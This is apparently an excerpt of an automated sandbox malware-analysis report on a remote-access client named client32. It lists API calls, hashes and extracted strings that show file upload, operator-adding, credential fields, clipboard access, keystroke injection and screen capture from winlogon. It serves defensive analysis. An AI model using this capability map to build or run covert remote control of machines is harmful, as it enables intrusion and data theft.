                                                                                                • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69CF50CB
                                                                                                • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69CF50E0
                                                                                                • Sleep.KERNEL32(00000014,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69CF50F2
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69CF5108
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69CF5135
                                                                                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69CF513F
                                                                                                • SetLastError.KERNEL32(?), ref: 69CF5154
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$ErrorLast$CountEnterLeaveTick_free$Sleep
                                                                                                • String ID: CMD=GETFILEINFO$GSK=%s$Gateway_Gsk$LINK=%s
                                                                                                • API String ID: 619989478-944126313
                                                                                                APIs
                                                                                                • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                                                • GetClipboardData.USER32 ref: 1103337D
                                                                                                • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                                                • GetLastError.KERNEL32 ref: 11033406
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                                                • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                                                • API String ID: 1861668072-1296821031
                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(00000000,00001770,0000000A,?,00000000,?,110CF1A6,?), ref: 1108946F
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
                                                                                                • LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLock
                                                                                                • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                                • API String ID: 2752051264-327499879
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,69D1232A,?,69D07F44,?,000000BC,?), ref: 69D11D00
                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,69D1232A,?,69D07F44,?,000000BC,?), ref: 69D11D29
                                                                                                • GetACP.KERNEL32(?,?,69D1232A,?,69D07F44,?,000000BC,?), ref: 69D11D3D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 69D08BA8
                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 69D08BBD
                                                                                                • UnhandledExceptionFilter.KERNEL32(69D2427C), ref: 69D08BC8
                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 69D08BE4
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 69D08BEB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 2579439406-0
                                                                                                APIs
                                                                                                • IsIconic.USER32(?), ref: 11113387
                                                                                                • GetTickCount.KERNEL32(?,11122D16,00000000,00000000), ref: 111133A1
                                                                                                Strings
                                                                                                • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                                                • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountIconicTick
                                                                                                • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                                                • API String ID: 1307367305-2838568823
                                                                                                APIs
                                                                                                • IsIconic.USER32(000000FF), ref: 110C10AD
                                                                                                • ShowWindow.USER32(000000FF,00000009), ref: 110C10BD
                                                                                                • BringWindowToTop.USER32(000000FF), ref: 110C10C7
                                                                                                • GetCurrentThreadId.KERNEL32(00000000,00000000,00000000,?,1105E793,00000001,00000001,?,00000000), ref: 110C10E8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$BringCurrentIconicShowThread
                                                                                                • String ID:
                                                                                                • API String ID: 4184413098-0
                                                                                                APIs
                                                                                                • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                                                • keybd_event.USER32 ref: 11113215
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ControlDevicekeybd_event
                                                                                                • String ID:
                                                                                                • API String ID: 1421710848-0
                                                                                                APIs
                                                                                                • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
                                                                                                • SetClipboardData.USER32(00000000,00000000), ref: 11033612
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$DataFormatName
                                                                                                • String ID:
                                                                                                • API String ID: 3172747766-0
                                                                                                APIs
                                                                                                • EnumSystemLocalesA.KERNEL32(Function_00031DB6,00000001), ref: 69D12164
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumLocalesSystem
                                                                                                • String ID:
                                                                                                • API String ID: 2099609381-0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9cd64dc5de210431f7f4314fe6c509be6f7c6deef7a1f989e222ebce1f15e448
                                                                                                • Instruction ID: 32a9178cd1bee4797ec904981b56cbfbcb0d10066372c48026e1d2a9d6bb37f3
                                                                                                • Opcode Fuzzy Hash: 9cd64dc5de210431f7f4314fe6c509be6f7c6deef7a1f989e222ebce1f15e448
                                                                                                • Instruction Fuzzy Hash: F9C11D76A50B139BD7198E68D8D07B1B391FF9C308F8A4638CF4667786D6397921CAC0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction ID: a06d34022f88d1348e9cd50ecdf0becadca41b0bfe52224f3366da9e397d29de
                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction Fuzzy Hash: 8B11E7B7640082C3D600CF6DD9B0EABA795FBE5329729837AD1614BE58F2A3F1559A00
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f17bd66ca498ffab784565415518fd43a0618959bb610f079ea05355ce8d3137
                                                                                                • Instruction ID: eecc460f0fc4220d1d2e96e1692f5b3c1b3742371597cb8e349a252ad92847e2
                                                                                                • Opcode Fuzzy Hash: f17bd66ca498ffab784565415518fd43a0618959bb610f079ea05355ce8d3137
                                                                                                • Instruction Fuzzy Hash: F611F272104E958BC31E9B11844B118B360EFA6A183B4569D9897DF2CECB239473DFD6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1c3bd6cb46bf8240d50efdfa66ac628336042c43f0bcfd8161288d853a1e5575
                                                                                                • Instruction ID: 6c7e449baa16b609e640e7a49cbc1d8f4a097c7658585760056147fc2be474bb
                                                                                                • Opcode Fuzzy Hash: 1c3bd6cb46bf8240d50efdfa66ac628336042c43f0bcfd8161288d853a1e5575
                                                                                                • Instruction Fuzzy Hash: 6B11CD33249B19DF9B0ECF24D19A155FB66FF42608B54917EC1128F5D9CB73A002CB09
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_fseek$__fsopen_free_memset
                                                                                                • String ID: CMD=PUTFILE$DATA=$FLEN=%d$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$MORE=%d$OFFSET=%d$ON=%s$PWD=%s$SUB=%s$ctl_putfile - _filelength FAILED (error: %d)$ctl_putfile - _topen FAILED (error: %d)$ctl_putfile - empty file (%s)$putfile - _read FAILED (error: %d)
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
                                                                                                • String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CED1BA
                                                                                                • WaitForSingleObject.KERNEL32(00000188,000000FF,00000001,00000000), ref: 69CED1E1
                                                                                                  • Part of subcall function 69CF7BE0: _memset.LIBCMT ref: 69CF7BFF
                                                                                                  • Part of subcall function 69CF7BE0: _strncpy.LIBCMT ref: 69CF7C0B
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898), ref: 69CED212
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CED223
                                                                                                  • Part of subcall function 69CE8C30: _memset.LIBCMT ref: 69CE8C5B
                                                                                                  • Part of subcall function 69CE8C30: _free.LIBCMT ref: 69CE8CCC
                                                                                                  • Part of subcall function 69CE8B50: _memset.LIBCMT ref: 69CE8B68
                                                                                                  • Part of subcall function 69CE8B50: wsprintfA.USER32 ref: 69CE8B87
                                                                                                • _free.LIBCMT ref: 69CED39A
                                                                                                • _strncpy.LIBCMT ref: 69CED3C9
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CED4D5
                                                                                                • _free.LIBCMT ref: 69CED53F
                                                                                                • _free.LIBCMT ref: 69CED545
                                                                                                • Sleep.KERNEL32(00000014), ref: 69CED573
                                                                                                • _free.LIBCMT ref: 69CED5C8
                                                                                                • Sleep.KERNEL32(00000064,?,?,?,?), ref: 69CED5DC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$_memset$CriticalSectionSleep_strncpy$EnterLeaveObjectSingleWait__vswprintf_mallocwsprintf
                                                                                                • String ID: 1.1$445817$CLIENT_IP_ADDRESS=%s$CLIENT_IP_ADDRESS=0.0.0.0$CLIENT_NAME=%s$CMD=CTL_CONNECT$CONTROL_NAME=%s$GSK=%s$Gateway_Gsk$Gateway_Password$Gateway_Username$HOSTNAME=%s$MACADDRESS=%s$PROTOCOL_VER=%u.%u$PWD=%s$USER=%s
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CF51AD
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898), ref: 69CF522C
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CF5245
                                                                                                • _free.LIBCMT ref: 69CF5348
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CF53DD
                                                                                                • _memset.LIBCMT ref: 69CF53F4
                                                                                                • _free.LIBCMT ref: 69CF5448
                                                                                                  • Part of subcall function 69CF7B60: _sprintf.LIBCMT ref: 69CF7B77
                                                                                                  • Part of subcall function 69CF77E0: _free.LIBCMT ref: 69CF77EF
                                                                                                • _free.LIBCMT ref: 69CF54AC
                                                                                                • _free.LIBCMT ref: 69CF54BB
                                                                                                • GetTickCount.KERNEL32 ref: 69CF54C9
                                                                                                • GetTickCount.KERNEL32 ref: 69CF54D3
                                                                                                • Sleep.KERNEL32(00000014), ref: 69CF54E9
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898), ref: 69CF5512
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CF554D
                                                                                                • _free.LIBCMT ref: 69CF53A3
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CF556E
                                                                                                • SetLastError.KERNEL32(00000057), ref: 69CF557D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$CriticalSection$CountEnterErrorLastLeaveTick_memset$FreeHeapSleep__vswprintf_malloc_sprintf
                                                                                                • String ID: CMD=ADDOPERATOR$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$NEWFN=%s$NEWON=%s$NEWPERMS=%u$NEWPWD=%s$ON=%s$PWD=%s$W$ctl_addoperator - INVALID PARAMETER
                                                                                                • API String ID: 4103114184-1141881251
                                                                                                • Opcode ID: 1ace9d96b48fa27e480f808870674e5b2bd87a8b53fc59505b46f44ee4c83a9d
                                                                                                • Instruction ID: 6e32b270356022aa50ade043c746bb8e99a9ab2c04403cd5933fc00e66572656
                                                                                                • Opcode Fuzzy Hash: 1ace9d96b48fa27e480f808870674e5b2bd87a8b53fc59505b46f44ee4c83a9d
                                                                                                • Instruction Fuzzy Hash: B5B153B5D00259ABDB20DFA4DC94FEEB774AF04308F40C4E9E60AA7541F7746A859F60
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CECDF0
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,00000000,?), ref: 69CECE13
                                                                                                • InterlockedIncrement.KERNEL32(-69D2CB16), ref: 69CECE29
                                                                                                • InterlockedIncrement.KERNEL32(-69D2CB86), ref: 69CECE2F
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CECE36
                                                                                                • _free.LIBCMT ref: 69CECF2C
                                                                                                • _free.LIBCMT ref: 69CECFD7
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CED029
                                                                                                • _free.LIBCMT ref: 69CED0CA
                                                                                                • _free.LIBCMT ref: 69CED109
                                                                                                • _free.LIBCMT ref: 69CED115
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$CriticalIncrementInterlockedSection$EnterErrorFreeHeapLastLeave__vswprintf_malloc_memset
                                                                                                • String ID: APPTYPE=%d$CMD=CTL_BROWSE$CONTEXT=%s$CSPEC=%s$CTLTYPE=%d$GSK$GSK=%s$Gateway_Gsk$Gateway_Name$Gateway_Password$Gateway_Username$MATCH_NAME=%s$PWD=%s$REQHOSTNAME=1$REQUSERNAME=1$SERVICETYPE=CLASS$SERVICETYPE=DEPT$USER=%s$WANTSHELP=1
                                                                                                • API String ID: 2543302378-3410294771
                                                                                                • Opcode ID: 092a15174d13064d7b50a4d3e31db7d45bb00d6ff5326694843e2c7f267ecc9e
                                                                                                • Instruction ID: 138ae8959a1466f2bd558c1bc2901f31a442768e68d6a5d9267304865bd4a334
                                                                                                • Opcode Fuzzy Hash: 092a15174d13064d7b50a4d3e31db7d45bb00d6ff5326694843e2c7f267ecc9e
                                                                                                • Instruction Fuzzy Hash: 8A9184B6C00259ABDB20DBA4DC40FEE7778AF44208F44D4E9E60A77541F7716A88DFA4
                                                                                                APIs
                                                                                                • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
                                                                                                • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
                                                                                                • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
                                                                                                • WaitForMultipleObjects.KERNEL32 ref: 110B3183
                                                                                                • OpenFileMappingA.KERNEL32 ref: 110B31A6
                                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
                                                                                                • GetDC.USER32(00000000), ref: 110B31E8
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
                                                                                                • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 110B3236
                                                                                                • GetTickCount.KERNEL32 ref: 110B323F
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
                                                                                                • GetTickCount.KERNEL32 ref: 110B327F
                                                                                                • GetLastError.KERNEL32(00000000), ref: 110B328E
                                                                                                • GdiFlush.GDI32 ref: 110B32A2
                                                                                                • SelectObject.GDI32(00000000,?), ref: 110B32AD
                                                                                                • DeleteObject.GDI32(00000000), ref: 110B32B4
                                                                                                • SetEvent.KERNEL32(?), ref: 110B32BE
                                                                                                • DeleteDC.GDI32(00000000), ref: 110B32C8
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B32E5
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B3309
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                                                • String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                                                • API String ID: 2071925733-2101319552
                                                                                                • Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                                • Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
                                                                                                • Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                                • Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975
                                                                                                • GetObjectA.GDI32(?,0000003C,?), ref: 110054E5
                                                                                                  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                                  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                                • wsprintfA.USER32 ref: 1100553D
                                                                                                • DeleteObject.GDI32(?), ref: 11005592
                                                                                                • DeleteObject.GDI32(?), ref: 1100559B
                                                                                                • SelectObject.GDI32(?,?), ref: 110055B2
                                                                                                • DeleteObject.GDI32(?), ref: 110055B8
                                                                                                • DeleteDC.GDI32(?), ref: 110055BE
                                                                                                • SelectObject.GDI32(?,?), ref: 110055CF
                                                                                                • DeleteObject.GDI32(?), ref: 110055D8
                                                                                                • DeleteDC.GDI32(?), ref: 110055DE
                                                                                                • DeleteObject.GDI32(?), ref: 110055EF
                                                                                                • DeleteObject.GDI32(?), ref: 1100561A
